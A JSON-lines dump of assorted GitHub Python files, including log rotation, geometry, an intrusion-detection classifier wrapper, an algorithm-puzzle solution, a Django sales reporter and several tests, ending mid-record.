def manageLogFile(fileLog, fileLogOld, daysBack):\n\t\n\tif os.path.exists(fileLog) == True:\n\n\t\tlog('checking current log file: ' + fileLog + ' ..')\n\n\t\ttimeNow = time.time()\n\t\ttimeDaysBack = timeNow - daysBack * 86400\n\t\tlog('.. date ' + str(daysBack) + ' days back: ' + time.ctime(timeDaysBack))\n\n\t\ttimeFile = os.stat(pathFileLog).st_ctime\n\t\tlog('.. log file creation date: ' + time.ctime(timeFile))\n\n\t\t\n\t\tif timeFile < timeDaysBack:\n\t\t\tlog('.. log file is older than ' + str(daysBack) + ' days')\n\t\t\tif os.path.exists(fileLogOld) == True:\n\t\t\t\tlog('.. deleting ' + fileLogOld + ' ..')\n\t\t\t\tos.remove(fileLogOld)\n\t\t\t\tlog('.. deleting ' + fileLogOld + ' done')\n\t\t\t\n\t\t\tlog('.. renaming ' + fileLog + ' ..')\n\t\t\tos.rename(fileLog, fileLogOld)\n\t\t\tlog('.. renaming ' + fileLog + ' done')\n\t\telse:\n\t\t\tlog('.. log file is not older than ' + str(daysBack) + ' days')\n\n\t\tlog('checking current log file: ' + fileLog + ' done', s=1)\n\n\n\nmanageDataFile(pathFileDataCurrent, pathFileDataPrevious)\nmanageLogFile(pathFileLog, pathFileLogOld, 30)\n\n\n\n# startTime = datetime.datetime.now()\n\n# #manageDataFile(pathFileDataCurrent, pathFileDataPrevious)\n# #print(\"Last modified: %s\" % time.ctime(os.path.getmtime(\"test.txt\")))\n# #print(\"Created: %s\" % time.ctime(os.path.getctime(\"test.txt\")))\n\n# timeNow = time.time()\n# timeOld = timeNow - 7 * 86400 # minus 7 days\n\n# log(str(timeNow))\n# log(str(timeOld))\n# log(time.ctime(timeNow))\n# log(time.ctime(timeOld))\n\n\n\n# log(str(os.path.getctime(pathFileLog)), s=1)\n\n\n# log(time.ctime(timeNow))\n# log(str(datetime.datetime.now()))\n# log(time.ctime(os.path.getctime(pathFileLog)))\n\n# log(str(os.stat(pathFileLog).st_ctime))\n\n#time.sleep(3)\n\n\n\n#log(str(datetime.timedelta(day=5)))\n\n\n\n\nlog('script run time: '+ str(datetime.datetime.now() - startTime), s=1)\n","repo_name":"goamage/roam","sub_path":"Python/Learning/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29014325469","text":"import math\n\n\nclass Position:\n def __init__(self, x:float, y:float):\n self.x = x\n self.y = y\n\n def __str__(self):\n return f'{self.x} / {self.y}'\n\n\nclass Polyline:\n def __init__(self):\n self.positions = []\n\n def add_position(self, pos: Position):\n self.positions.append(pos)\n\n def length(self):\n if len(self.positions) < 2:\n return 0\n overall = 0\n for i in range(1, len(self.positions)):\n p1 = self.positions[i - 1]\n p2 = self.positions[i]\n distance = math.sqrt((p1.x - p2.x) * (p1.x - p2.x) + (p1.y - p2.y) * (p1.y - p2.y))\n overall = overall + distance\n return overall\n\n def __str__(self):\n res = \"\"\n for p in self.positions:\n res = f'{res}\\n {str(p)}'\n return f'Positions:{res}\\nLength: {self.length()}'\n\n\npoly = Polyline()\npoly.add_position(Position(0, 0))\npoly.add_position(Position(10, 0))\npoly.add_position(Position(10, 10))\nprint(poly)","repo_name":"Marloto/prog2-ws2022","sub_path":"09-positions/muster.py","file_name":"muster.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
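# Polyline.length() in the record above sums pairwise Euclidean distances by
# hand; since Python 3.8 the same result can be computed with math.dist. A
# self-contained sketch (assuming plain (x, y) tuples rather than the
# record's Position objects):
import math

def polyline_length(points):
    # distance between each consecutive pair of points, summed
    return sum(math.dist(a, b) for a, b in zip(points, points[1:]))

assert polyline_length([(0, 0), (10, 0), (10, 10)]) == 20.0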
 +{"seq_id":"39257576543","text":"import tensorflow as tf\r\nimport pandas as pd\r\nimport model.probe_dnn.label as label\r\nimport os\r\n\r\n# load the model\r\nfeature_names = []\r\nfn_path = os.path.dirname(os.path.realpath(__file__)) + \"/Field_Names.txt\"\r\nwith open(fn_path, \"r\") as f:\r\n for line in f.readlines()[0:]:\r\n name, __ = line.strip()[:-1].split(\":\")\r\n feature_names.append(name)\r\n\r\npath = os.path.dirname(os.path.realpath(__file__)) + \"/dos_model.h5\"\r\nmodel = tf.keras.models.load_model(path)\r\n\r\n\r\ndef dos_model(data):\r\n # DoS model\r\n df = pd.DataFrame(columns=feature_names)\r\n if isinstance(data, list):\r\n df.loc[0] = data\r\n elif isinstance(data, pd.DataFrame):\r\n df = data\r\n df.columns = feature_names\r\n else:\r\n print(\"Please pass a list or a DataFrame\")\r\n return\r\n\r\n df2 = label.trans(df)\r\n prec = model.predict(df2.df)\r\n threshold = 0.5\r\n prec2 = 1 if prec[0][0] > threshold else 0\r\n df = df.drop([0], axis=0)\r\n return prec2\r\n","repo_name":"myeongseop2/NIDS_project","sub_path":"source/model/dos_dnn/dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"71297979410","text":"# [Baekjoon 20057] Magician Shark and Tornado\n# import sys\n# input = sys.stdin.readline\n\n# N = int(input().rstrip())\n# data = [list(map(int, input().split())) for _ in range(N)]\n\n# # move the sand\n# def moveSand(prev, y, x, d):\n# sand = 0\n# percent1 = int(prev*0.01)\n# percent2 = int(prev*0.02)\n# percent5 = int(prev*0.05)\n# percent7 = int(prev*0.07)\n# percent10 = int(prev*0.1)\n# return sand\n\n# cy, cx = N//2, N//2\n# count = 0\n# for i in range(1, N+1):\n# # odd step: move left, then down\n# if i % 2 != 0:\n# # left\n# count += moveSand(data[cy][cx], cy, cx-i, 'left')\n# cx -= i\n# # down\n# count += moveSand(data[cy][cx], cy-i, cx, 'down')\n# cy -= i\n# else: # even step: move right, then up\n# # right\n# count += moveSand(data[cy][cx], cy, cx+i, 'right')\n# cx += i\n# # up\n# count += moveSand(data[cy][cx], cy+i, cx, 'up')\n# cy += i\n\n\n# function that redistributes the sand\ndef recount(time, dx, dy, direction):\n global ans, s_x, s_y\n\n # update the x and y coordinates one step at a time\n for _ in range(time):\n s_x += dx\n s_y += dy\n if s_y < 0: # stop once the tornado leaves the grid\n break\n\n # 3. a, out_sand\n total = 0 # accumulator used to derive a\n for dx, dy, z in direction:\n nx = s_x + dx\n ny = s_y + dy\n if z == 0: # a (the remainder)\n new_sand = sand[s_x][s_y] - total\n else: # fixed ratio\n new_sand = int(sand[s_x][s_y] * z)\n total += new_sand\n\n if 0 <= nx < N and 0 <= ny < N: # inside the grid: add the sand\n sand[nx][ny] += new_sand\n else: # outside the grid: count it towards ans\n ans += new_sand\n\n\nN = int(input())\nsand = [list(map(int, input().split())) for _ in range(N)]\n\n
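# The direction tables below are all derived from one hand-written `left`
# table by mirroring or rotating each (dx, dy) offset. A tiny standalone
# check of that coordinate trick (demo values only, not part of the
# submitted solution):
_demo_left = [(0, -1), (1, -1)]
_demo_right = [(x, -y) for x, y in _demo_left]  # mirroring the y offset turns left into right
assert _demo_right == [(0, 1), (1, 1)]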
# 2. sand-ratio offsets for each direction\nleft = [(1, 1, 0.01), (-1, 1, 0.01), (1, 0, 0.07), (-1, 0, 0.07), (1, -1, 0.1),\n (-1, -1, 0.1), (2, 0, 0.02), (-2, 0, 0.02), (0, -2, 0.05), (0, -1, 0)]\nright = [(x, -y, z) for x, y, z in left]\ndown = [(-y, x, z) for x, y, z in left]\nup = [(y, x, z) for x, y, z in left]\n\ns_x, s_y = N//2, N//2 # starting coordinates (centre of the grid)\nans = 0 # out_sand\n\n# 1. tornado rotation direction\nfor i in range(1, N + 1):\n if i % 2:\n recount(i, 0, -1, left)\n recount(i, 1, 0, down)\n else:\n recount(i, 0, 1, right)\n recount(i, -1, 0, up)\n\nprint(ans)\n","repo_name":"BBIYAC/CodingTest","sub_path":"Baekjoon/20057.py","file_name":"20057.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70662679570","text":"from django.conf import settings\nfrom django.utils import timezone\n\nfrom pymongo import MongoClient\n\nimport requests\n\nimport os\n\nfrom decimal import Decimal\n\ndef stringify_date(date_list):\n return ''.join(['%s-' % elem for elem in date_list])[:-1]\n\ndef stringify_service_and_dates(service=None, date=None, _from=None, to=None):\n if service:\n string = service\n else:\n string = ''\n\n if date:\n if service:\n string += '_'\n string += stringify_date(date.values())\n else:\n if service:\n string += '_'\n string += stringify_date(_from.split('-'))\n if service:\n string += '_to_'\n else:\n string += ' To '\n string += stringify_date(to.split('-'))\n\n return string\n\ndef vends_reporter(date=None, _from=None, to=None):\n url = settings.VENDOR_VENDS_URL\n\n if date:\n response = requests.get(url, params=date).json()\n file_name = '%s.%s' % (stringify_service_and_dates(service='vends', date=date), 'csv')\n else:\n response = requests.get(url, params={'from': _from, 'to': to}).json()\n file_name = '%s.%s' % (stringify_service_and_dates(service='vends', _from=_from, to=to), 'csv')\n\n vendors = response['vendors']\n voucher_values = response['voucher_values']\n\n if vendors:\n # Add more key/value pairs to vendor objects\n\n # Add total vend value\n [vendor.update({\n 'total_vend_value': sum([vc['value'] * vc['count'] for vc in vendor['vend_count']])\n }) for vendor in vendors]\n\n # Add total vend count\n [vendor.update({\n 'total_vend_count': sum([vc['count'] for vc in vendor['vend_count']])\n }) for vendor in vendors]\n\n header = '%s%s%s%s%s%s%s%s\\n' % (\n 'Vendor Name,',\n 'Vendor Company,',\n ','.join([str(value) for value in voucher_values]),\n ',Total Vend Count',\n ',Total Vend Value (GHS)',\n ',Bonus',\n ',Commission',\n ',Net Revenue'\n )\n\n _file = os.path.join(settings.MEDIA_ROOT, file_name)\n\n with open(_file, 'w') as f:\n f.write(header)\n for vendor in vendors:\n vend_count = vendor['vend_count']\n vend_count_string = ','.join([str(elem['count']) for elem in vend_count])\n\n sales = Decimal(vendor['total_vend_value'])\n bonus = revenue = sales / 2\n commission = (sales - bonus) / 10\n net_revenue = revenue - commission\n\n line = '%s,%s,%s,%s,%s,%s,%s,%s\\n' % (\n vendor['name'],\n vendor['company_name'],\n vend_count_string,\n vendor['total_vend_count'],\n str(sales),\n str(bonus),\n str(commission),\n str(net_revenue)\n )\n\n f.write(line)\n\n # Insert into database\n # vendor_collection = get_collection('vendors')\n # result = vendor_collection.insert_many(vendors)\n\n return file_name\n\ndef send_report(service, _file, date=None, _from=None, to=None):\n subject_and_body = settings.EMAIL_SUBJECT_AND_BODY[service]\n subject = subject_and_body['subject']\n body = 
subject_and_body['body']\n\n period = stringify_service_and_dates(service=None, date=date, _from=_from, to=to)\n\n # Send email\n response = requests.get(settings.MESSAGING_URL, params={\n 'subject': '%s: %s' % (subject, period),\n 'message': body,\n 'sender': settings.DEFAULT_FROM_EMAIL,\n 'recipients': settings.TO,\n 'file': _file,\n })\n\n return response\n\nREPORT_HANDLERS = {\n 'vends': vends_reporter,\n}\n\ndef create_report(host, service, date=None, _from=None, to=None):\n report = REPORT_HANDLERS[service]\n\n if date:\n file_name = report(date=date)\n else:\n file_name = report(_from=_from, to=to)\n\n if file_name:\n _file = '%s%s%s%s' % ('http://', host, settings.MEDIA_URL, file_name)\n return _file\n\ndef get_collection(collection_name):\n client = MongoClient()\n db = client.reports\n return db[collection_name]","repo_name":"deone/reports","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1094091930","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef cop(f_ext, h_ext, m) -> float:\n g: float = 9.81\n z = f_ext * h_ext / m / g\n return z\n\n\nh_ext = 2.0\nmass_robot = 50\nf_ext_max = 100\nf_ext = np.linspace(0, 100)\n\ncop_deviation = cop(f_ext, h_ext, mass_robot)\n\nplt.plot(f_ext, cop_deviation)\nplt.xlabel(\"Applied force [N]\")\nplt.ylabel(\"CoM-CoP [m]\")\nplt.show()\n","repo_name":"andrei-herdt/playground","sub_path":"analysis/plot_forces.py","file_name":"plot_forces.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25888045132","text":"import pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.simplefilter('ignore')\n\n\ndef owners(cell):\n if cell in ['1владелец', '1 владелец']:\n return 1\n elif cell in ['2владельца', '2 владельца']:\n return 2\n else:\n return 3\n\n\ndef vendor(cell):\n if cell in ['bmw', 'mercedes', 'volkswagen', 'audi']:\n return 'Германия'\n elif cell == 'volvo':\n return 'Швеция'\n elif cell == 'skoda':\n return 'Чехия'\n else:\n return 'Япония'\n\n\npd.set_option('display.max_columns', None)\n\ndata_test = pd.read_csv('test.csv')\ndata = pd.read_csv('train.csv')\n\n# ================================================================================\n# Train data preparing\n\ndata = data.drop(\n ['Статус', 'Кузов №', 'Количество месте', 'Запас хода', 'Количество мест', 'Налог', 'Обмен',\n 'Класс автомобиля', 'Таможня'], axis=1\n )\n\ndata = data.rename(\n columns={'год выпуска': 'productionDate', 'Пробег': 'mileage', 'Кузов': 'bodyType', 'Цвет': 'color',\n 'Страна марки': 'vendor', 'Коробка': 'vehicleTransmission', 'Количество дверей': 'numberOfDoors',\n 'Complectation': 'complectation_dict'}\n )\n\ndata = data[['bodyType', 'brand', 'color', 'complectation_dict', 'engineDisplacement', 'enginePower', 'fuelType',\n 'mileage', 'model_name', 'numberOfDoors', 'productionDate', 'vehicleTransmission', 'vendor', 'Владельцы',\n 'ПТС', 'Привод', 'Руль', 'Состояние', 'price']]\n\ncolumns = list(data.columns)[:-1]\n\ndata = data.dropna(how='all').reset_index(drop=True)\n\ndata['mileage'] = data['mileage'].apply(lambda x: int(x[:x.find('км')]))\n\ndata['engineDisplacement'] = data['engineDisplacement'].apply(lambda x: float(x[:x.find('л')]))\ndata['enginePower'] = data['enginePower'].apply(\n lambda x: int(float(x[:x.find('кВт')]) * 1.36) if x.find('л.') == -1 else 
int(x[:x.find('л')]))\n\ncheck_list = data[data['numberOfDoors'] == 0]['model_name'].to_list()\n\nfor model in check_list:\n data[(data['model_name'] == model) & (data['numberOfDoors'] == 0)] = \\\n data[(data['model_name'] == model) & (data['numberOfDoors'] != 0)].mode()\n\ndata = data.dropna(how='all').reset_index(drop=True)\n\ndata['fuelType'] = data['fuelType'].apply(lambda x: 'электро' if len(str(x)) == 3 else x.lower())\ndata['fuelType'] = data['fuelType'].apply(lambda x: 'газ' if x.find('газобаллонное') != -1 else x)\n\nfor row in range(data.shape[0]):\n if data['fuelType'].iloc[row] == 'электро':\n data['engineDisplacement'].iloc[row] = 0\n\ndata['Владельцы'] = data['Владельцы'].apply(owners).astype(object)\n\ndata['complectation_dict'] = data['complectation_dict'].apply(\n lambda x: x.replace('[', '').replace(']', '').replace(\"'\", '').split(', '))\ndata['complectation'] = data['complectation_dict'].apply(lambda x: len(x))\ndata = data.drop(['complectation_dict'], axis=1)\n\ndata['price'] = data['price'].apply(lambda x: x / 100)\n\n# ================================================================================\n# Test data preparing\n\ndata_test = data_test[columns]\ndata_test['brand'] = data_test['brand'].apply(lambda x: x.lower())\n\ndata_test['complectation_dict'] = data_test['complectation_dict'].fillna(0)\ndata_test['complectation'] = data_test['complectation_dict'].apply(\n lambda x: len(x[x.find('[') + 1:x.find(']')].split('\",\"')) if x else x)\ndata_test = data_test.drop(['complectation_dict'], axis=1)\n\ndata_test['engineDisplacement'] = data_test['engineDisplacement'].apply(\n lambda x: float(x[:x.find('LTR')]) if len(x) > 4 else 0)\n\ndata_test['enginePower'] = data_test['enginePower'].apply(lambda x: int(x[:x.find('N')]))\n\ndata_test['vendor'] = data_test['brand'].apply(vendor)\n\ndata_test['Владельцы'] = data_test['Владельцы'].apply(lambda x: owners(x.replace('\\xa0', ''))).astype(object)\n\ndata.to_csv('train_prepared.csv', index=False)\ndata_test.to_csv('test_prepared.csv', index=False)\n\n","repo_name":"RifatM21/Skill_factory","sub_path":"Pr_6/data_prepare.py","file_name":"data_prepare.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1916615993","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\nfrom . import admin\nfrom .. 
import db\nfrom .forms import CreateUserForm, DeactiveUserForm, ActiveUserForm\nfrom .forms import RenewfeeForm, RenewTrafficForm\nfrom ..models import User, Userlog, Package, Usertraffic\nfrom flask import render_template, session, redirect, url_for, request\nfrom datetime import datetime\nfrom dateutil.relativedelta import *\n\n\ndef get_period(payday):\n # the billing period starts on the payday of the current month, or of the\n # previous month if this month's payday has not been reached yet\n d = datetime.now()\n if d.day < payday:\n d = d + relativedelta(months=-1)\n return datetime(d.year, d.month, payday, 0, 0, 0).strftime(\"%y-%m-%d\")\n\n\n@admin.route(\"/\")\ndef admin_main():\n return render_template(\"admin/main.html\")\n\n@admin.route(\"/info/user\")\ndef admin_user_info():\n users = []\n for user in User.query.all():\n package = Package.query.filter_by(id=user.package_id).first()\n\n if user.status == 'active':\n if relativedelta(user.expired, datetime.now()).months >= 1:\n left = \"\"\n else:\n left = \"({0} days left)\".format(relativedelta(user.expired, datetime.now()).days)\n users.append({\"id\":user.id, \"name\":user.name, \"payday\":user.payday, \"package\":package.name, \"package_traffic\":package.traffic, \\\n \"expired\":user.expired.strftime(\"%y-%m-%d\"), \"left\":left, \"status\":user.status})\n else:\n users.append({\"id\":user.id, \"name\":user.name, \"payday\":user.payday, \"package_traffic\":package.traffic, \\\n \"package\":package.name, \"expired\":user.expired.strftime(\"%y-%m-%d\"), \"left\":\"\",\"status\":user.status})\n return render_template(\"admin/info/user.html\", users=users)\n\n\n@admin.route(\"/info/runtime\")\ndef admin_user_runtime():\n runtimes = []\n for user in User.query.all():\n if user.status == 'active':\n usertraffic = Usertraffic.query.filter_by(user_id=user.id).filter_by(period=get_period(user.payday)).first()\n if usertraffic is None:\n continue\n runtimes.append({\"name\":user.name, \"package_traffic\":usertraffic.package_traffic, \"expired\":user.expired.strftime(\"%y-%m-%d\"), \\\n \"consume_traffic\":usertraffic.consume_traffic/1024/1024, \"period\":usertraffic.period, \"status\":\"active\"})\n else:\n runtimes.append({\"name\":user.name, \"package_traffic\":0, \"expired\":user.expired.strftime(\"%y-%m-%d\"), \\\n \"consume_traffic\":0, \"period\":\"NA\", \"status\":\"inactive\"})\n return render_template(\"admin/info/runtime.html\", runtimes=runtimes)\n \n\n@admin.route(\"/ops/renewfee\", methods=['GET', 'POST'])\ndef admin_renewfee_user():\n form = RenewfeeForm()\n if form.validate_on_submit():\n user = User.query.filter_by(name=form.name.data).first()\n if user is None:\n return redirect(url_for(\"admin.admin_main\"))\n periods = 1\n expired = None\n if form.renew.data == '1m':\n expired = user.expired + relativedelta(months=+1)\n elif form.renew.data == '3m':\n expired = user.expired + relativedelta(months=+3)\n periods = 3\n elif form.renew.data == '6m':\n expired = user.expired + relativedelta(months=+6)\n periods = 6\n elif form.renew.data == '1y':\n expired = user.expired + relativedelta(years=+1)\n periods = 12\n else:\n pass\n package = Package.query.filter_by(id = user.package_id).first()\n for p in range(0, periods):\n period = (user.expired + relativedelta(months=+p)).strftime(\"%y-%m-%d\")\n usertraffic = Usertraffic(package_traffic=package.traffic, period=period, user_id=user.id)\n db.session.add(usertraffic)\n db.session.commit()\n\n user.expired = expired\n db.session.add(user)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return 
render_template(\"admin/ops/renewfee.html\", form=form)\n\n\n@admin.route(\"/ops/renewtraffic\", methods=['GET', 'POST'])\ndef admin_renewtraffic_user():\n form = RenewTrafficForm()\n if form.validate_on_submit():\n user = User.query.filter_by(name = form.name.data).first()\n if user is None:\n return \"ok\", 404\n usertraffic = Usertraffic.query.filter_by(user_id=user.id).filter_by(period=get_period(user.payday)).first()\n if usertraffic is None:\n return \"ok\", 404\n usertraffic.package_traffic = usertraffic.package_traffic + int(form.traffic.data)\n db.session.add(usertraffic)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/renewtraffic.html\", form=form)\n\n\n@admin.route(\"/ops/createuser\", methods=['GET', 'POST'])\ndef admin_create_user():\n form = CreateUserForm()\n packages=[]\n for package in Package.query.all():\n packages.append((str(package.id), package.name))\n form.package.choices = packages\n\n if form.validate_on_submit():\n expired = datetime.now()\n periods = 1\n if form.expired.data == '3d':\n expired = expired + relativedelta(days=+3)\n elif form.expired.data == '1m':\n expired = expired + relativedelta(months=+1)\n elif form.expired.data == '3m':\n expired = expired + relativedelta(months=+3)\n periods = 3\n elif form.expired.data == '6m':\n expired = expired + relativedelta(months=+6)\n periods = 6\n elif form.expired.data == '1y':\n expired = expired + relativedelta(years=+1)\n periods = 12\n else:\n pass\n user = User(name=form.name.data, password = form.password.data,\n payday = int(datetime.now().day), package_id = int(form.package.data),\n expired = datetime(expired.year, expired.month, expired.day, 0, 0, 0), status=\"active\")\n db.session.add(user)\n db.session.commit()\n package = Package.query.filter_by(id = form.package.data).first()\n for p in range(0, periods):\n period = (datetime.now() + relativedelta(months=+p)).strftime(\"%y-%m-%d\")\n usertraffic = Usertraffic(package_traffic=package.traffic, period=period, user_id=user.id)\n db.session.add(usertraffic)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/create_user.html\", form=form)\n\n\n@admin.route(\"/ops/deactiveuser\", methods=['GET', 'POST'])\ndef admin_deactive_user():\n form = DeactiveUserForm()\n if form.validate_on_submit():\n user = User.query.filter_by(name=form.name.data).first()\n if user is None:\n return \"ok\", 404\n for usertraffic in user.traffics.all():\n db.session.delete(usertraffic)\n db.session.commit()\n user.status = \"inactive\"\n db.session.add(user)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/deactive_user.html\", form=form)\n\n\n@admin.route(\"/ops/activeuser\", methods=['POST', 'GET'])\ndef admin_active_user():\n form = ActiveUserForm()\n packages=[]\n for package in Package.query.all():\n packages.append((str(package.id), package.name))\n form.package.choices = packages\n\n if form.validate_on_submit():\n expired = datetime.now()\n periods = 1\n if form.expired.data == '1m':\n expired = expired + relativedelta(months=+1)\n elif form.expired.data == '3m':\n expired = expired + relativedelta(months=+3)\n periods = 3\n elif form.expired.data == '6m':\n expired = expired + relativedelta(months=+6)\n periods = 6\n elif form.expired.data == '1y':\n expired = expired + relativedelta(years=+1)\n periods = 12\n else:\n pass\n user = 
User.query.filter_by(name=form.name.data).first()\n user.payday = int(datetime.now().day)\n user.package_id = int(form.package.data)\n user.expired = datetime(expired.year, expired.month, expired.day, 0, 0, 0)\n user.status = \"active\"\n db.session.add(user)\n db.session.commit()\n\n package = Package.query.filter_by(id = form.package.data).first()\n for p in range(0, periods):\n period = (datetime.now() + relativedelta(months=+p)).strftime(\"%y-%m-%d\")\n usertraffic = Usertraffic(package_traffic=package.traffic, period=period, user_id=user.id)\n db.session.add(usertraffic)\n db.session.commit()\n return redirect(url_for(\"admin.admin_main\"))\n else:\n return render_template(\"admin/ops/active_user.html\", form=form)\n\n@admin.route(\"/startuserlog\", methods=['POST'])\ndef admin_start_user_log():\n start = datetime.now()\n user = User.query.filter_by(name=request.form['user']).first()\n if user is None:\n return \"ok\", 404\n userlog = Userlog(interface=request.form['interface'], status=\"up\",\n start=datetime(start.year, start.month, start.day, start.hour, start.minute, start.second),\n end=datetime(start.year, start.month, start.day, 0, 0, 0), traffic=0, user_id=user.id)\n db.session.add(userlog)\n db.session.commit()\n return \"ok\", 200\n\n\n@admin.route(\"/stopuserlog\", methods=['POST'])\ndef admin_stop_user_log():\n end = datetime.now()\n userlog = Userlog.query.filter_by(interface=request.form[\"interface\"]).filter_by(status='up').first()\n if userlog is None:\n return \"ok\", 404\n userlog.end = datetime(end.year, end.month, end.day, end.hour, end.minute, end.second)\n userlog.status = 'down'\n userlog.traffic = int(request.form['traffic'])\n db.session.add(userlog)\n db.session.commit()\n\n user = User.query.filter_by(id=userlog.user_id).first()\n usertraffic = Usertraffic.query.filter_by(user_id=userlog.user_id).filter_by(period=get_period(user.payday)).first()\n usertraffic.consume_traffic = usertraffic.consume_traffic + int(request.form[\"traffic\"])\n db.session.add(usertraffic)\n db.session.commit()\n return \"ok\", 200\n","repo_name":"sharkconi/cross","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11606940037","text":"import numpy as np\n\nfrom yt.analysis_modules.level_sets.api import \\\n Clump, \\\n find_clumps, \\\n get_lowest_clumps\nfrom yt.frontends.stream.api import \\\n load_uniform_grid\nfrom yt.testing import \\\n assert_array_equal, \\\n assert_equal\n\ndef test_clump_finding():\n n_c = 8\n n_p = 1\n dims = (n_c, n_c, n_c)\n\n density = np.ones(dims)\n high_rho = 10.\n # add a couple disconnected density enhancements\n density[2, 2, 2] = high_rho\n density[6, 6, 6] = high_rho\n\n # put a particle at the center of one of them\n dx = 1. / n_c\n px = 2.5 * dx * np.ones(n_p)\n \n data = {\"density\": density,\n \"particle_mass\": np.ones(n_p),\n \"particle_position_x\": px,\n \"particle_position_y\": px,\n \"particle_position_z\": px,\n \"number_of_particles\": n_p}\n\n ds = load_uniform_grid(data, dims)\n\n ad = ds.all_data()\n master_clump = Clump(ad, (\"gas\", \"density\"))\n master_clump.add_validator(\"min_cells\", 1)\n\n find_clumps(master_clump, 0.5, 2. 
* high_rho, 10.)\n\n # there should be two children\n assert_equal(len(master_clump.children), 2)\n\n leaf_clumps = get_lowest_clumps(master_clump)\n # two leaf clumps\n assert_equal(len(leaf_clumps), 2)\n\n\n # check some clump fields\n assert_equal(master_clump.children[0][\"density\"][0].size, 1)\n assert_equal(master_clump.children[0][\"density\"][0], ad[\"density\"].max())\n assert_equal(master_clump.children[0][\"particle_mass\"].size, 1)\n assert_array_equal(master_clump.children[0][\"particle_mass\"], ad[\"particle_mass\"])\n assert_equal(master_clump.children[1][\"density\"][0].size, 1)\n assert_equal(master_clump.children[1][\"density\"][0], ad[\"density\"].max())\n assert_equal(master_clump.children[1][\"particle_mass\"].size, 0)\n","repo_name":"bkhamesra/yt-EinsteinToolkit","sub_path":"yt/analysis_modules/level_sets/tests/test_clump_finding.py","file_name":"test_clump_finding.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19855009973","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QMessageBox\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\n\n\nclass App(QWidget):\n\n def __init__(self):\n super().__init__()\n self.title = 'PyQt5 messagebox - pythonspot.com'\n self.left = 10\n self.top = 10\n self.width = 320\n self.height = 200\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n self.show()\n\n def lockin_error_window(self, error_message):\n print('Trying to generate error_message_window')\n # error_message_window('WARNING - Lock-in Status Issues',\n # inform_text='Something is wrong with the lockin.\\n LIAS? 
Response is: '\n # + str(error_message) + '\\nContinue Anyway?')\n\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Warning)\n msg.setText('Lock-in Status Register Flagged Issue(s)')\n msg.setInformativeText('One or more lock-in issues are present which may affect your results.\\n'\n 'LIA Status Register Value is: ' + str(error_message) + '\\n\\nContinue Anyway?')\n msg.setWindowTitle(' - Warning - ')\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Abort)\n # msg.buttonClicked.connect(msgbtn)\n return_value = msg.exec()\n print('msg.clickedButton(): ' + str(msg.clickedButton()))\n print('msg box return value: ' + str(return_value))\n if return_value == QMessageBox.Abort:\n print('Abort pressed')\n elif return_value == QMessageBox.Ok:\n print('OK pressed')\n\n def print_test(self):\n print('test')\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n ex.lockin_error_window(3)\n sys.exit(app.exec_())\n\n","repo_name":"NREL/QIS","sub_path":"PADMR/padmr/tests/q_message_box_test.py","file_name":"q_message_box_test.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33642943982","text":"import json\n\nimport pytest\n\n\ndef call(taxi_feedback, path, request):\n return taxi_feedback.post(\n '/1.0/{}'.format(path),\n request,\n headers={'YaTaxi-Api-Key': 'feedback_apikey'},\n )\n\n\n@pytest.mark.now('2018-08-10T21:01:30+0300')\n@pytest.mark.config(\n FEEDBACK_SAVE_MODE='feedbacks',\n FEEDBACK_RETRIEVE_FROM_DBFEEDBACK=True,\n EXCLUDED_DRIVERS_PERSONAL_DATA_WRITE_MODE={\n '__default__': 'old_way',\n 'feedback_save': 'both_fallback',\n },\n)\ndef test_one(taxi_feedback, mockserver):\n @mockserver.json_handler('/personal/v1/driver_licenses/store')\n def mock_personal_store(request):\n request_json = json.loads(request.get_data())\n assert 'value' in request_json\n return {\n 'id': request_json['value'] + 'ID',\n 'value': request_json['value'],\n }\n\n retrieve_request = {'order_id': 'order_id', 'from_archive': False}\n response = call(taxi_feedback, 'retrieve', retrieve_request)\n assert response.status_code == 404\n\n save_request = {\n 'id': 'user_id',\n 'phone_id': '123456789012345678901234',\n 'order_id': 'order_id',\n 'rating': 3,\n 'msg': 'message',\n 'call_me': True,\n 'app_comment': False,\n 